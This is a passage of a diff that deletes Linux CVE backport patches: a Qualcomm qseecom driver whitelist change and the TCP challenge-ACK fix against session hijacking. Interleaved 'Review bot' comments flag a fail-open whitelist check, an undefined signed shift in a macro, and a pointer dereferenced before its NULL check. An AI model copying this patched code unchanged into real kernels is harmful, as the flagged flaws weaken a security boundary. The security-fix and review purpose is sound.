qseecom.whitelist_support = true; - ret = 0; - } else { -- pr_err("Failed to check whitelist: ret = %d, result = 0x%x\n", -+ pr_info("Check whitelist with ret = %d, result = 0x%x\n", - ret, resp.result); -+ qseecom.whitelist_support = false; -+ ret = 0; - } - kfree(buf); - return ret; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-5349/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2016-5349/ANY/0004.patch deleted file mode 100644 index e33e19fc..00000000 --- a/Patches/Linux_CVEs/CVE-2016-5349/ANY/0004.patch +++ /dev/null 
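Review bot: The second hunk makes `qseecom_check_whitelist_feature` fail open: any unexpected reply to the test call now sets `qseecom.whitelist_support = false`, returns 0, and is logged only at `pr_info`. Because the whitelist table is the hardening this series introduces, an unrelated or transient SCM error at probe time leaves the driver on the legacy command ids with nothing prominent in the log. I would keep the message at warning level, e.g. `pr_warn("whitelist check failed (ret = %d, result = 0x%x), using legacy commands\n", ret, resp.result);`. I would also add a comment above the `else` stating that the fallback is deliberate. After this change the function returns non-zero only for `-ENOMEM`, so the `if (rc)` in `qseecom_probe` no longer catches a failed check.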
@@ -1,630 +0,0 @@ -From 9bd398661cae758ffc557adc7de74ba32654e1f9 Mon Sep 17 00:00:00 2001 -From: Zhen Kong -Date: Fri, 2 Sep 2016 22:09:23 -0700 -Subject: qseecom: whitelist support for kernel client and listener - --- Add whitelist support for listener to send modified resp to TZ; --- support whitelist for kernel client; --- Change the method to check whitelist feature. - -Change-Id: I0030b0008d6224cda3fdc1f80308a7e9bcfe4405 -Signed-off-by: Zhen Kong ---- - drivers/misc/qseecom.c | 322 +++++++++++++++++++++++++------------------- - include/soc/qcom/qseecomi.h | 19 +++ - 2 files changed, 206 insertions(+), 135 deletions(-) - -diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c -index 061bc99..35f0b94 100644 ---- a/drivers/misc/qseecom.c -+++ b/drivers/misc/qseecom.c -@@ -131,6 +131,35 @@ static DEFINE_MUTEX(qsee_bw_mutex); - static DEFINE_MUTEX(app_access_lock); - static DEFINE_MUTEX(clk_access_lock); - -+struct sglist_info { -+ uint32_t indexAndFlags; -+ uint32_t sizeOrCount; -+}; -+ -+/* -+ * The 31th bit indicates only one or multiple physical address inside -+ * the request buffer. If it is set, the index locates a single physical addr -+ * inside the request buffer, and `sizeOrCount` is the size of the memory being -+ * shared at that physical address. -+ * Otherwise, the index locates an array of {start, len} pairs (a -+ * "scatter/gather list"), and `sizeOrCount` gives the number of entries in -+ * that array. -+ * -+ * The 30th bit indicates 64 or 32bit address; when it is set, physical addr -+ * and scatter gather entry sizes are 64-bit values. Otherwise, 32-bit values. -+ * -+ * The bits [0:29] of `indexAndFlags` hold an offset into the request buffer. 
-+ */ -+#define SGLISTINFO_SET_INDEX_FLAG(c, s, i) \ -+ ((uint32_t)(((c & 1) << 31) | ((s & 1) << 30) | (i & 0x3fffffff))) -+ -+#define SGLISTINFO_TABLE_SIZE (sizeof(struct sglist_info) * MAX_ION_FD) -+ -+#define FEATURE_ID_WHITELIST 15 /*whitelist feature id*/ -+ -+#define MAKE_WHITELIST_VERSION(major, minor, patch) \ -+ (((major & 0x3FF) << 22) | ((minor & 0x3FF) << 12) | (patch & 0xFFF)) -+ - struct qseecom_registered_listener_list { - struct list_head list; - struct qseecom_register_listener_req svc; -@@ -145,6 +174,8 @@ struct qseecom_registered_listener_list { - bool listener_in_use; - /* wq for thread blocked on this listener*/ - wait_queue_head_t listener_block_app_wq; -+ struct sglist_info sglistinfo_ptr[MAX_ION_FD]; -+ uint32_t sglist_cnt; - }; - - struct qseecom_registered_app_list { -@@ -268,30 +299,6 @@ struct qseecom_listener_handle { - - static struct qseecom_control qseecom; - --struct sglist_info { -- uint32_t indexAndFlags; -- uint32_t sizeOrCount; --}; -- --/* -- * The 31th bit indicates only one or multiple physical address inside -- * the request buffer. If it is set, the index locates a single physical addr -- * inside the request buffer, and `sizeOrCount` is the size of the memory being -- * shared at that physical address. -- * Otherwise, the index locates an array of {start, len} pairs (a -- * "scatter/gather list"), and `sizeOrCount` gives the number of entries in -- * that array. -- * -- * The 30th bit indicates 64 or 32bit address; when it is set, physical addr -- * and scatter gather entry sizes are 64-bit values. Otherwise, 32-bit values. -- * -- * The bits [0:29] of `indexAndFlags` hold an offset into the request buffer. 
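Review bot: `SGLISTINFO_SET_INDEX_FLAG` in the first hunk uses its arguments unparenthesised and shifts an `int` into the sign bit: callers pass `(sg_ptr->nents == 1)` for `c`, so `(c & 1) << 31` is a signed left shift of 1 by 31, which ISO C leaves undefined. The `i & 0x3fffffff` mask also silently truncates an offset of 2^30 or more instead of rejecting it, and whether every caller bounds the offset first is not visible on this page. A safer form is `((uint32_t)((((uint32_t)(c) & 1) << 31) | (((uint32_t)(s) & 1) << 30) | ((uint32_t)(i) & 0x3fffffff)))`. `MAKE_WHITELIST_VERSION` just below has the same unparenthesised arguments.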
-- */ --#define SGLISTINFO_SET_INDEX_FLAG(c, s, i) \ -- ((uint32_t)(((c & 1) << 31) | ((s & 1) << 30) | (i & 0x3fffffff))) -- --#define SGLISTINFO_TABLE_SIZE (sizeof(struct sglist_info) * MAX_ION_FD) -- - struct qseecom_dev_handle { - enum qseecom_client_handle_type type; - union { -@@ -305,8 +312,9 @@ struct qseecom_dev_handle { - bool perf_enabled; - bool fast_load_enabled; - enum qseecom_bandwidth_request_mode mode; -- struct sglist_info *sglistinfo_ptr; -+ struct sglist_info sglistinfo_ptr[MAX_ION_FD]; - uint32_t sglist_cnt; -+ bool use_legacy_cmd; - }; - - struct qseecom_key_id_usage_desc { -@@ -584,6 +592,34 @@ static int qseecom_scm_call2(uint32_t svc_id, uint32_t tz_cmd_id, - ret = scm_call2(smc_id, &desc); - break; - } -+ case QSEOS_LISTENER_DATA_RSP_COMMAND_WHITELIST: { -+ struct qseecom_client_listener_data_irsp *req; -+ struct qseecom_client_listener_data_64bit_irsp *req_64; -+ -+ smc_id = -+ TZ_OS_LISTENER_RESPONSE_HANDLER_WITH_WHITELIST_ID; -+ desc.arginfo = -+ TZ_OS_LISTENER_RESPONSE_HANDLER_WITH_WHITELIST_PARAM_ID; -+ if (qseecom.qsee_version < QSEE_VERSION_40) { -+ req = -+ (struct qseecom_client_listener_data_irsp *) -+ req_buf; -+ desc.args[0] = req->listener_id; -+ desc.args[1] = req->status; -+ desc.args[2] = req->sglistinfo_ptr; -+ desc.args[3] = req->sglistinfo_len; -+ } else { -+ req_64 = -+ (struct qseecom_client_listener_data_64bit_irsp *) -+ req_buf; -+ desc.args[0] = req_64->listener_id; -+ desc.args[1] = req_64->status; -+ desc.args[2] = req_64->sglistinfo_ptr; -+ desc.args[3] = req_64->sglistinfo_len; -+ } -+ ret = scm_call2(smc_id, &desc); -+ break; -+ } - case QSEOS_LOAD_EXTERNAL_ELF_COMMAND: { - struct qseecom_load_app_ireq *req; - struct qseecom_load_app_64bit_ireq *req_64bit; -@@ -1124,7 +1160,7 @@ static int qseecom_register_listener(struct qseecom_dev_handle *data, - return -EBUSY; - } - -- new_entry = kmalloc(sizeof(*new_entry), GFP_KERNEL); -+ new_entry = kzalloc(sizeof(*new_entry), GFP_KERNEL); - if (!new_entry) { - 
pr_err("kmalloc failed\n"); - return -ENOMEM; -@@ -1585,6 +1621,16 @@ static int __qseecom_qseos_fail_return_resp_tz(struct qseecom_dev_handle *data, - return ret; - } - -+static void __qseecom_clean_listener_sglistinfo( -+ struct qseecom_registered_listener_list *ptr_svc) -+{ -+ if (ptr_svc->sglist_cnt) { -+ memset(ptr_svc->sglistinfo_ptr, 0, -+ SGLISTINFO_TABLE_SIZE); -+ ptr_svc->sglist_cnt = 0; -+ } -+} -+ - static int __qseecom_process_incomplete_cmd(struct qseecom_dev_handle *data, - struct qseecom_command_scm_resp *resp) - { -@@ -1593,9 +1639,14 @@ static int __qseecom_process_incomplete_cmd(struct qseecom_dev_handle *data, - uint32_t lstnr; - unsigned long flags; - struct qseecom_client_listener_data_irsp send_data_rsp; -+ struct qseecom_client_listener_data_64bit_irsp send_data_rsp_64bit; - struct qseecom_registered_listener_list *ptr_svc = NULL; - sigset_t new_sigset; - sigset_t old_sigset; -+ uint32_t status; -+ void *cmd_buf = NULL; -+ size_t cmd_len; -+ struct sglist_info *table = NULL; - - while (resp->result == QSEOS_RESULT_INCOMPLETE) { - lstnr = resp->data; -@@ -1669,15 +1720,42 @@ static int __qseecom_process_incomplete_cmd(struct qseecom_dev_handle *data, - pr_err("Abort clnt %d waiting on lstnr svc %d, ret %d", - data->client.app_id, lstnr, ret); - rc = -ENODEV; -- send_data_rsp.status = QSEOS_RESULT_FAILURE; -+ status = QSEOS_RESULT_FAILURE; - } else { -- send_data_rsp.status = QSEOS_RESULT_SUCCESS; -+ status = QSEOS_RESULT_SUCCESS; - } - - qseecom.send_resp_flag = 0; - ptr_svc->send_resp_flag = 0; -- send_data_rsp.qsee_cmd_id = QSEOS_LISTENER_DATA_RSP_COMMAND; -- send_data_rsp.listener_id = lstnr; -+ table = ptr_svc->sglistinfo_ptr; -+ if (qseecom.qsee_version < QSEE_VERSION_40) { -+ send_data_rsp.listener_id = lstnr; -+ send_data_rsp.status = status; -+ send_data_rsp.sglistinfo_ptr = -+ (uint32_t)virt_to_phys(table); -+ send_data_rsp.sglistinfo_len = -+ SGLISTINFO_TABLE_SIZE; -+ dmac_flush_range((void *)table, -+ (void *)table + 
SGLISTINFO_TABLE_SIZE); -+ cmd_buf = (void *)&send_data_rsp; -+ cmd_len = sizeof(send_data_rsp); -+ } else { -+ send_data_rsp_64bit.listener_id = lstnr; -+ send_data_rsp_64bit.status = status; -+ send_data_rsp_64bit.sglistinfo_ptr = -+ virt_to_phys(table); -+ send_data_rsp_64bit.sglistinfo_len = -+ SGLISTINFO_TABLE_SIZE; -+ dmac_flush_range((void *)table, -+ (void *)table + SGLISTINFO_TABLE_SIZE); -+ cmd_buf = (void *)&send_data_rsp_64bit; -+ cmd_len = sizeof(send_data_rsp_64bit); -+ } -+ if (qseecom.whitelist_support == false) -+ *(uint32_t *)cmd_buf = QSEOS_LISTENER_DATA_RSP_COMMAND; -+ else -+ *(uint32_t *)cmd_buf = -+ QSEOS_LISTENER_DATA_RSP_COMMAND_WHITELIST; - if (ptr_svc) - msm_ion_do_cache_op(qseecom.ion_clnt, ptr_svc->ihandle, - ptr_svc->sb_virt, ptr_svc->sb_length, -@@ -1687,10 +1765,9 @@ static int __qseecom_process_incomplete_cmd(struct qseecom_dev_handle *data, - __qseecom_enable_clk(CLK_QSEE); - - ret = qseecom_scm_call(SCM_SVC_TZSCHEDULER, 1, -- (const void *)&send_data_rsp, -- sizeof(send_data_rsp), resp, -- sizeof(*resp)); -+ cmd_buf, cmd_len, resp, sizeof(*resp)); - ptr_svc->listener_in_use = false; -+ __qseecom_clean_listener_sglistinfo(ptr_svc); - if (ret) { - pr_err("scm_call() failed with err: %d (app_id = %d)\n", - ret, data->client.app_id); -@@ -1818,9 +1895,14 @@ static int __qseecom_reentrancy_process_incomplete_cmd( - uint32_t lstnr = 0; - unsigned long flags; - struct qseecom_client_listener_data_irsp send_data_rsp; -+ struct qseecom_client_listener_data_64bit_irsp send_data_rsp_64bit; - struct qseecom_registered_listener_list *ptr_svc = NULL; - sigset_t new_sigset; - sigset_t old_sigset; -+ uint32_t status; -+ void *cmd_buf = NULL; -+ size_t cmd_len; -+ struct sglist_info *table = NULL; - - while (ret == 0 && rc == 0 && resp->result == QSEOS_RESULT_INCOMPLETE) { - lstnr = resp->data; -@@ -1883,13 +1965,38 @@ static int __qseecom_reentrancy_process_incomplete_cmd( - pr_err("Abort clnt %d waiting on lstnr svc %d, ret %d", - 
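Review bot: The added `table = ptr_svc->sglistinfo_ptr;` in `__qseecom_process_incomplete_cmd` dereferences `ptr_svc` a few lines before the existing `if (ptr_svc)` guard around `msm_ion_do_cache_op`, and the added `__qseecom_clean_listener_sglistinfo(ptr_svc)` after the SCM call dereferences it again. Either a check outside the hunk already guarantees the pointer is non-NULL, in which case the guard is dead code, or it can be NULL and the new lines fault first. The listener lookup is not visible here. The `@@ -1883,13 +1965,38 @@` hunk adds the same pattern to `__qseecom_reentrancy_process_incomplete_cmd`. If NULL is possible, hoist the test above the new lines, for instance `if (!ptr_svc) { rc = -ENODEV; break; }`, adjusted to whatever exit restores the signal mask outside the hunk.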
data->client.app_id, lstnr, ret); - rc = -ENODEV; -- send_data_rsp.status = QSEOS_RESULT_FAILURE; -+ status = QSEOS_RESULT_FAILURE; - } else { -- send_data_rsp.status = QSEOS_RESULT_SUCCESS; -+ status = QSEOS_RESULT_SUCCESS; - } -- -- send_data_rsp.qsee_cmd_id = QSEOS_LISTENER_DATA_RSP_COMMAND; -- send_data_rsp.listener_id = lstnr; -+ table = ptr_svc->sglistinfo_ptr; -+ if (qseecom.qsee_version < QSEE_VERSION_40) { -+ send_data_rsp.listener_id = lstnr; -+ send_data_rsp.status = status; -+ send_data_rsp.sglistinfo_ptr = -+ (uint32_t)virt_to_phys(table); -+ send_data_rsp.sglistinfo_len = SGLISTINFO_TABLE_SIZE; -+ dmac_flush_range((void *)table, -+ (void *)table + SGLISTINFO_TABLE_SIZE); -+ cmd_buf = (void *)&send_data_rsp; -+ cmd_len = sizeof(send_data_rsp); -+ } else { -+ send_data_rsp_64bit.listener_id = lstnr; -+ send_data_rsp_64bit.status = status; -+ send_data_rsp_64bit.sglistinfo_ptr = -+ virt_to_phys(table); -+ send_data_rsp_64bit.sglistinfo_len = -+ SGLISTINFO_TABLE_SIZE; -+ dmac_flush_range((void *)table, -+ (void *)table + SGLISTINFO_TABLE_SIZE); -+ cmd_buf = (void *)&send_data_rsp_64bit; -+ cmd_len = sizeof(send_data_rsp_64bit); -+ } -+ if (qseecom.whitelist_support == false) -+ *(uint32_t *)cmd_buf = QSEOS_LISTENER_DATA_RSP_COMMAND; -+ else -+ *(uint32_t *)cmd_buf = -+ QSEOS_LISTENER_DATA_RSP_COMMAND_WHITELIST; - if (ptr_svc) - msm_ion_do_cache_op(qseecom.ion_clnt, ptr_svc->ihandle, - ptr_svc->sb_virt, ptr_svc->sb_length, -@@ -1899,11 +2006,9 @@ static int __qseecom_reentrancy_process_incomplete_cmd( - __qseecom_enable_clk(CLK_QSEE); - - ret = qseecom_scm_call(SCM_SVC_TZSCHEDULER, 1, -- (const void *)&send_data_rsp, -- sizeof(send_data_rsp), resp, -- sizeof(*resp)); -- -+ cmd_buf, cmd_len, resp, sizeof(*resp)); - ptr_svc->listener_in_use = false; -+ __qseecom_clean_listener_sglistinfo(ptr_svc); - wake_up_interruptible(&ptr_svc->listener_block_app_wq); - - if (ret) { -@@ -2901,7 +3006,7 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data, - 
cmd_len = sizeof(struct qseecom_client_send_data_64bit_ireq); - } - -- if (qseecom.whitelist_support == false) -+ if (qseecom.whitelist_support == false || data->use_legacy_cmd == true) - *(uint32_t *)cmd_buf = QSEOS_CLIENT_SEND_DATA_COMMAND; - else - *(uint32_t *)cmd_buf = QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST; -@@ -3006,6 +3111,8 @@ static int __qseecom_update_cmd_buf(void *msg, bool cleanup, - struct qseecom_send_modfd_cmd_req *req = NULL; - struct qseecom_send_modfd_listener_resp *lstnr_resp = NULL; - struct qseecom_registered_listener_list *this_lstnr = NULL; -+ uint32_t offset; -+ struct sg_table *sg_ptr; - - if ((data->type != QSEECOM_LISTENER_SERVICE) && - (data->type != QSEECOM_CLIENT_APP)) -@@ -3027,7 +3134,6 @@ static int __qseecom_update_cmd_buf(void *msg, bool cleanup, - } - - for (i = 0; i < MAX_ION_FD; i++) { -- struct sg_table *sg_ptr = NULL; - if ((data->type != QSEECOM_LISTENER_SERVICE) && - (req->ifd_data[i].fd > 0)) { - ihandle = ion_import_dma_buf(qseecom.ion_clnt, -@@ -3169,14 +3275,25 @@ static int __qseecom_update_cmd_buf(void *msg, bool cleanup, - ihandle, NULL, len, - ION_IOC_CLEAN_INV_CACHES); - if (data->type == QSEECOM_CLIENT_APP) { -+ offset = req->ifd_data[i].cmd_buf_offset; - data->sglistinfo_ptr[i].indexAndFlags = - SGLISTINFO_SET_INDEX_FLAG( -- (sg_ptr->nents == 1), 0, -- req->ifd_data[i].cmd_buf_offset); -+ (sg_ptr->nents == 1), 0, offset); - data->sglistinfo_ptr[i].sizeOrCount = - (sg_ptr->nents == 1) ? - sg->length : sg_ptr->nents; - data->sglist_cnt = i + 1; -+ } else { -+ offset = (lstnr_resp->ifd_data[i].cmd_buf_offset -+ + (uintptr_t)lstnr_resp->resp_buf_ptr - -+ (uintptr_t)this_lstnr->sb_virt); -+ this_lstnr->sglistinfo_ptr[i].indexAndFlags = -+ SGLISTINFO_SET_INDEX_FLAG( -+ (sg_ptr->nents == 1), 0, offset); -+ this_lstnr->sglistinfo_ptr[i].sizeOrCount = -+ (sg_ptr->nents == 1) ? 
-+ sg->length : sg_ptr->nents; -+ this_lstnr->sglist_cnt = i + 1; - } - } - /* Deallocate the handle */ -@@ -3249,6 +3366,8 @@ static int __qseecom_update_cmd_buf_64(void *msg, bool cleanup, - struct qseecom_send_modfd_cmd_req *req = NULL; - struct qseecom_send_modfd_listener_resp *lstnr_resp = NULL; - struct qseecom_registered_listener_list *this_lstnr = NULL; -+ uint32_t offset; -+ struct sg_table *sg_ptr; - - if ((data->type != QSEECOM_LISTENER_SERVICE) && - (data->type != QSEECOM_CLIENT_APP)) -@@ -3270,7 +3389,6 @@ static int __qseecom_update_cmd_buf_64(void *msg, bool cleanup, - } - - for (i = 0; i < MAX_ION_FD; i++) { -- struct sg_table *sg_ptr = NULL; - if ((data->type != QSEECOM_LISTENER_SERVICE) && - (req->ifd_data[i].fd > 0)) { - ihandle = ion_import_dma_buf(qseecom.ion_clnt, -@@ -3387,14 +3505,25 @@ cleanup: - ihandle, NULL, len, - ION_IOC_CLEAN_INV_CACHES); - if (data->type == QSEECOM_CLIENT_APP) { -+ offset = req->ifd_data[i].cmd_buf_offset; - data->sglistinfo_ptr[i].indexAndFlags = - SGLISTINFO_SET_INDEX_FLAG( -- (sg_ptr->nents == 1), 1, -- req->ifd_data[i].cmd_buf_offset); -+ (sg_ptr->nents == 1), 1, offset); - data->sglistinfo_ptr[i].sizeOrCount = - (sg_ptr->nents == 1) ? - sg->length : sg_ptr->nents; - data->sglist_cnt = i + 1; -+ } else { -+ offset = (lstnr_resp->ifd_data[i].cmd_buf_offset -+ + (uintptr_t)lstnr_resp->resp_buf_ptr - -+ (uintptr_t)this_lstnr->sb_virt); -+ this_lstnr->sglistinfo_ptr[i].indexAndFlags = -+ SGLISTINFO_SET_INDEX_FLAG( -+ (sg_ptr->nents == 1), 1, offset); -+ this_lstnr->sglistinfo_ptr[i].sizeOrCount = -+ (sg_ptr->nents == 1) ? 
-+ sg->length : sg_ptr->nents; -+ this_lstnr->sglist_cnt = i + 1; - } - } - /* Deallocate the handle */ -@@ -4091,21 +4220,12 @@ int qseecom_start_app(struct qseecom_handle **handle, - data->client.user_virt_sb_base = 0; - data->client.ihandle = NULL; - -- /* Allocate sglistinfo buffer for kernel client */ -- data->sglistinfo_ptr = kzalloc(SGLISTINFO_TABLE_SIZE, GFP_KERNEL); -- if (!(data->sglistinfo_ptr)) { -- kfree(data); -- kfree(*handle); -- *handle = NULL; -- return -ENOMEM; -- } - init_waitqueue_head(&data->abort_wq); - - data->client.ihandle = ion_alloc(qseecom.ion_clnt, size, 4096, - ION_HEAP(ION_QSECOM_HEAP_ID), 0); - if (IS_ERR_OR_NULL(data->client.ihandle)) { - pr_err("Ion client could not retrieve the handle\n"); -- kfree(data->sglistinfo_ptr); - kfree(data); - kfree(*handle); - *handle = NULL; -@@ -4203,7 +4323,6 @@ int qseecom_start_app(struct qseecom_handle **handle, - return 0; - - err: -- kfree(data->sglistinfo_ptr); - kfree(data); - kfree(*handle); - *handle = NULL; -@@ -4251,7 +4370,6 @@ int qseecom_shutdown_app(struct qseecom_handle **handle) - - mutex_unlock(&app_access_lock); - if (ret == 0) { -- kzfree(data->sglistinfo_ptr); - kzfree(data); - kzfree(*handle); - kzfree(kclient); -@@ -4317,8 +4435,11 @@ int qseecom_send_command(struct qseecom_handle *handle, void *send_buf, - } - perf_enabled = true; - } -+ if (!strcmp(data->client.app_name, "securemm")) -+ data->use_legacy_cmd = true; - - ret = __qseecom_send_cmd(data, &req); -+ data->use_legacy_cmd = false; - if (qseecom.support_bus_scaling) - __qseecom_add_bw_scale_down_timer( - QSEECOM_SEND_CMD_CRYPTO_TIMEOUT); -@@ -6990,6 +7111,7 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg) - wake_up_all(&data->abort_wq); - if (ret) - pr_err("failed qseecom_send_mod_resp: %d\n", ret); -+ __qseecom_clean_data_sglistinfo(data); - break; - } - case QSEECOM_QTEEC_IOCTL_OPEN_SESSION_REQ: { -@@ -7139,12 +7261,6 @@ static int qseecom_open(struct inode *inode, struct file *file) - 
data->mode = INACTIVE; - init_waitqueue_head(&data->abort_wq); - atomic_set(&data->ioctl_count, 0); -- -- data->sglistinfo_ptr = kzalloc(SGLISTINFO_TABLE_SIZE, GFP_KERNEL); -- if (!(data->sglistinfo_ptr)) { -- kzfree(data); -- return -ENOMEM; -- } - return ret; - } - -@@ -7199,7 +7315,6 @@ static int qseecom_release(struct inode *inode, struct file *file) - if (data->perf_enabled == true) - qsee_disable_clock_vote(data, CLK_DFAB); - } -- kfree(data->sglistinfo_ptr); - kfree(data); - - return ret; -@@ -7948,73 +8063,14 @@ out: - } - - /* -- * Check if whitelist feature is supported by making a test scm_call -- * to send a whitelist command to an invalid app ID 0 -+ * Check whitelist feature, and if TZ feature version is < 1.0.0, -+ * then whitelist feature is not supported. - */ - static int qseecom_check_whitelist_feature(void) - { -- struct qseecom_client_send_data_ireq send_data_req = {0}; -- struct qseecom_client_send_data_64bit_ireq send_data_req_64bit = {0}; -- struct qseecom_command_scm_resp resp; -- uint32_t buf_size = 128; -- void *buf = NULL; -- void *cmd_buf = NULL; -- size_t cmd_len; -- int ret = 0; -- phys_addr_t pa; -+ int version = scm_get_feat_version(FEATURE_ID_WHITELIST); - -- buf = kzalloc(buf_size, GFP_KERNEL); -- if (!buf) -- return -ENOMEM; -- pa = virt_to_phys(buf); -- if (qseecom.qsee_version < QSEE_VERSION_40) { -- send_data_req.qsee_cmd_id = -- QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST; -- send_data_req.app_id = 0; -- send_data_req.req_ptr = (uint32_t)pa; -- send_data_req.req_len = buf_size; -- send_data_req.rsp_ptr = (uint32_t)pa; -- send_data_req.rsp_len = buf_size; -- send_data_req.sglistinfo_ptr = (uint32_t)pa; -- send_data_req.sglistinfo_len = buf_size; -- cmd_buf = (void *)&send_data_req; -- cmd_len = sizeof(struct qseecom_client_send_data_ireq); -- } else { -- send_data_req_64bit.qsee_cmd_id = -- QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST; -- send_data_req_64bit.app_id = 0; -- send_data_req_64bit.req_ptr = (uint64_t)pa; -- 
send_data_req_64bit.req_len = buf_size; -- send_data_req_64bit.rsp_ptr = (uint64_t)pa; -- send_data_req_64bit.rsp_len = buf_size; -- send_data_req_64bit.sglistinfo_ptr = (uint64_t)pa; -- send_data_req_64bit.sglistinfo_len = buf_size; -- cmd_buf = (void *)&send_data_req_64bit; -- cmd_len = sizeof(struct qseecom_client_send_data_64bit_ireq); -- } -- ret = qseecom_scm_call(SCM_SVC_TZSCHEDULER, 1, -- cmd_buf, cmd_len, -- &resp, sizeof(resp)); --/* -- * If this cmd exists and whitelist is supported, scm_call return -2 (scm -- * driver remap it to -EINVAL) and resp.result 0xFFFFFFED(-19); Otherwise, -- * scm_call return -1 (remap to -EIO). -- */ -- if (ret == -EIO) { -- qseecom.whitelist_support = false; -- ret = 0; -- } else if (ret == -EINVAL && -- resp.result == QSEOS_RESULT_FAIL_SEND_CMD_NO_THREAD) { -- qseecom.whitelist_support = true; -- ret = 0; -- } else { -- pr_info("Check whitelist with ret = %d, result = 0x%x\n", -- ret, resp.result); -- qseecom.whitelist_support = false; -- ret = 0; -- } -- kfree(buf); -- return ret; -+ return version >= MAKE_WHITELIST_VERSION(1, 0, 0); - } - - static int qseecom_probe(struct platform_device *pdev) -@@ -8265,11 +8321,7 @@ static int qseecom_probe(struct platform_device *pdev) - qseecom.qsee_perf_client = msm_bus_scale_register_client( - qseecom_platform_support); - -- rc = qseecom_check_whitelist_feature(); -- if (rc) { -- rc = -EINVAL; -- goto exit_destroy_ion_client; -- } -+ qseecom.whitelist_support = qseecom_check_whitelist_feature(); - pr_warn("qseecom.whitelist_support = %d\n", - qseecom.whitelist_support); - -diff --git a/include/soc/qcom/qseecomi.h b/include/soc/qcom/qseecomi.h -index b0a8d67..e33fd9f 100644 ---- a/include/soc/qcom/qseecomi.h -+++ b/include/soc/qcom/qseecomi.h -@@ -68,6 +68,7 @@ enum qseecom_qceos_cmd_id { - QSEOS_CLIENT_SEND_DATA_COMMAND_WHITELIST = 0x1C, - QSEOS_TEE_OPEN_SESSION_WHITELIST = 0x1D, - QSEOS_TEE_INVOKE_COMMAND_WHITELIST = 0x1E, -+ QSEOS_LISTENER_DATA_RSP_COMMAND_WHITELIST = 0x1F, - 
QSEOS_FSM_LTEOTA_REQ_CMD = 0x109, - QSEOS_FSM_LTEOTA_REQ_RSP_CMD = 0x110, - QSEOS_FSM_IKE_REQ_CMD = 0x203, -@@ -217,6 +218,16 @@ __packed struct qseecom_client_listener_data_irsp { - uint32_t qsee_cmd_id; - uint32_t listener_id; - uint32_t status; -+ uint32_t sglistinfo_ptr; -+ uint32_t sglistinfo_len; -+}; -+ -+__packed struct qseecom_client_listener_data_64bit_irsp { -+ uint32_t qsee_cmd_id; -+ uint32_t listener_id; -+ uint32_t status; -+ uint64_t sglistinfo_ptr; -+ uint32_t sglistinfo_len; - }; - - /* -@@ -703,4 +714,12 @@ __packed struct qseecom_continue_blocked_request_ireq { - TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_BUF_RW, \ - TZ_SYSCALL_PARAM_TYPE_VAL) - -+#define TZ_OS_LISTENER_RESPONSE_HANDLER_WITH_WHITELIST_ID \ -+ TZ_SYSCALL_CREATE_SMC_ID(TZ_OWNER_QSEE_OS, TZ_SVC_LISTENER, 0x05) -+ -+#define TZ_OS_LISTENER_RESPONSE_HANDLER_WITH_WHITELIST_PARAM_ID \ -+ TZ_SYSCALL_CREATE_PARAM_ID_4( \ -+ TZ_SYSCALL_PARAM_TYPE_VAL, TZ_SYSCALL_PARAM_TYPE_VAL, \ -+ TZ_SYSCALL_PARAM_TYPE_BUF_RW, TZ_SYSCALL_PARAM_TYPE_VAL) -+ - #endif /* __QSEECOMI_H_ */ --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-5696/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-5696/ANY/0001.patch deleted file mode 100644 index d91940dc..00000000 --- a/Patches/Linux_CVEs/CVE-2016-5696/ANY/0001.patch +++ /dev/null 
@@ -1,81 +0,0 @@
-From 75ff39ccc1bd5d3c455b6822ab09e533c551f758 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet
-Date: Sun, 10 Jul 2016 10:04:02 +0200
-Subject: tcp: make challenge acks less predictable
-
-Yue Cao claims that current host rate limiting of challenge ACKS
-(RFC 5961) could leak enough information to allow a patient attacker
-to hijack TCP sessions. He will soon provide details in an academic
-paper.
-
-This patch increases the default limit from 100 to 1000, and adds
-some randomization so that the attacker can no longer hijack
-sessions without spending a considerable amount of probes.
-
-Based on initial analysis and patch from Linus.
-
-Note that we also have per socket rate limiting, so it is tempting
-to remove the host limit in the future.
-
-v2: randomize the count of challenge acks per second, not the period.
-
-Fixes: 282f23c6ee34 ("tcp: implement RFC 5961 3.2")
-Reported-by: Yue Cao
-Signed-off-by: Eric Dumazet
-Suggested-by: Linus Torvalds
-Cc: Yuchung Cheng
-Cc: Neal Cardwell
-Acked-by: Neal Cardwell
-Acked-by: Yuchung Cheng
-Signed-off-by: David S. Miller
----
- net/ipv4/tcp_input.c | 15 ++++++++++-----
- 1 file changed, 10 insertions(+), 5 deletions(-)
-
-diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
-index d6c8f4cd0..91868bb 100644
---- a/net/ipv4/tcp_input.c
-+++ b/net/ipv4/tcp_input.c
-@@ -87,7 +87,7 @@ int sysctl_tcp_adv_win_scale __read_mostly = 1;
- EXPORT_SYMBOL(sysctl_tcp_adv_win_scale);
-
- /* rfc5961 challenge ack rate limiting */
--int sysctl_tcp_challenge_ack_limit = 100;
-+int sysctl_tcp_challenge_ack_limit = 1000;
-
- int sysctl_tcp_stdurg __read_mostly;
- int sysctl_tcp_rfc1337 __read_mostly;
-@@ -3458,7 +3458,7 @@ static void tcp_send_challenge_ack(struct sock *sk, const struct sk_buff *skb)
- static u32 challenge_timestamp;
- static unsigned int challenge_count;
- struct tcp_sock *tp = tcp_sk(sk);
-- u32 now;
-+ u32 count, now;
-
- /* First check our per-socket dupack rate limit.
*/
- if (tcp_oow_rate_limited(sock_net(sk), skb,
-@@ -3466,13 +3466,18 @@ static void tcp_send_challenge_ack(struct sock *sk, const struct sk_buff *skb)
- &tp->last_oow_ack_time))
- return;
-
-- /* Then check the check host-wide RFC 5961 rate limit. */
-+ /* Then check host-wide RFC 5961 rate limit. */
- now = jiffies / HZ;
- if (now != challenge_timestamp) {
-+ u32 half = (sysctl_tcp_challenge_ack_limit + 1) >> 1;
-+
- challenge_timestamp = now;
-- challenge_count = 0;
-+ WRITE_ONCE(challenge_count, half +
